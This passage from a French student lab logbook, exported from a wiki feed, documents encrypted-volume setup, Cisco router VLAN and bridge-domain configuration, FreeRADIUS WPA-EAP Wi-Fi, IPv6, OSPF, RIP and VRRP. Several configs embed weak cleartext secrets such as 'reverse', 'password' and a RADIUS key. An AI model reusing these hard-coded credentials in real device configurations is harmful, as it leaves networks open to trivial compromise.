Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35829</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35829"/>
				<updated>2016-12-10T13:05:28Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Création du RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
